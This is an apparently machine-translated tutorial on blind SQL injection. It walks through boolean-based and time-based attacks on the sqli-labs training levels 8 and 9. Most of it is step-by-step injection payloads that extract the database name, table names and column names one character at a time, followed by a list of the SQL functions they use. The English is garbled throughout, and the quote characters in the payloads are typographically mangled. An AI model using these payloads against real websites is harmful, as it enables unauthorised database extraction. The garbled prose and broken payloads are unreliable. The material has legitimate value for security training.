sql Blind note (web penetration )

• sql Blind note Mainly dealing with the page face wed Use when the error response is better （ namely , Error does not echo ）

Bull's blind note

Use page return still No return We can judge the desired result by changing these two states （ Boolean for 0 or 1 Two cases ）

The problem solving steps ：（ The following examples are all based on sql-lab less-8 For example ）

1. Get the length of the database name ： ?id=1’ and (length(database()))=8-- q( utilize > < or = To determine the length of its database )

2. Get the database name ：

   • ?id=1’ and ascii(substr(database(),1,1))=115 Indicates from the database 1 Start taking a length （ You will get a decimal number , utilize ASCII Table converts it into letters or symbols ） The first is s、

   • It can also be done through burp suite To do it

3. Get the number of tables ： ?id=1’ and (select count(*) from information_schema.tables where table_schema=‘security’)>5(=4)-- q

4. Get the length of the name of the table ： ?id=1’and (select length(table_name) from information_schema.tables where table_schema=‘security’ limit 0,1)>5(=6)-- q Yes 6 Length

5. Get the name of the table ： ?id=1’and (ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1)))=101-- q The first is e

6. Get field name ：?id=1’and (ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1)))=105-- q The first is i

The function of Boolean blind note

• String concatenation function ： Concat ,concat_ws, group_concat
• String truncation function ：Substr, mid, left , right, locate
• Returns the specified ASCII Functions required by string ：ascii,ord
• Returns the... Corresponding to the specified number ascii Code character ：char
• String substitution ：replace
• Calculate correlation ： length( length ) count( Count )

Time blind note

• Time blind note ：（ With sql-lab less-9 For example ） The problem solving steps

The Ninth level is found according to the blind note just now, no matter what conditions are entered , The echo result is a , It is proved that the Boolean blind note just now cannot be used , Try to use time blind

1. Parsing library name length ： ?id=1’ and if(length(database())=8,sleep(5),1)-- q（ If set up , Just react in five seconds , notes ： there 1 It doesn't mean anything ）

2. Resolve database name ：?id=1’ and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q The first is s

3. Resolve table name ： ?id=1’ and if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)-- q The first is e

4. Resolve field name ：?id=1’ and if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)-- q The first is i

The function of time blind ：

• sleep() Hang the program for a while n by n second
• if(expr1,expr2,expr3) Judgment statement If the first statement is correct, execute the second statement If there is an error, execute the third statement .